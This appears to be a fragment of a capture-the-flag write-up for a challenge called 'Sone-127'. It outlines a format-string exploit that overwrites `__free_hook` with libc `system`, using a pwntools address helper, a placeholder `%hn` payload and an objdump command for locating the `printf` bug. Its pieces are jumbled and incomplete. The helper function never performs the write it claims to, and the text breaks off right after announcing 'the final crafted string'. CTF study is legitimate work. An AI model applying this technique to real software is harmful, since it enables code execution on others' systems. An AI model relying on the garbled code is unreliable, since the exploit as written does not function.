2021 - Sone-127

```python
# Assumes pwntools is imported (`from pwn import *`) and `libc` is an ELF object for the target libc.
def write_free_hook(io, libc_base):
    # Resolve the runtime addresses from the leaked libc base.
    system_addr = libc_base + libc.sym['system']
    free_hook = libc_base + libc.sym['__free_hook']
    log.info(f'system: {hex(system_addr)}')
    log.info(f'__free_hook: {hex(free_hook)}')
```

```
> echo AAAA%low%8$hn%high%9$hnBBBBaddr_lowaddr_high
```

Where `addr_low` and `addr_high` are the low and high 2‑byte parts of `__free_hook`, placed in the payload after the format string so that they appear on the stack as the 8th and 9th arguments.

```python
# 2️⃣ Overwrite __free_hook with system
write_free_hook(io, libc_base)
```

from pwn import *

The vulnerable call in the binary is `printf(user_input);`, which can be located using `objdump -d sone127d | grep -i printf`:

The final crafted string (Python example):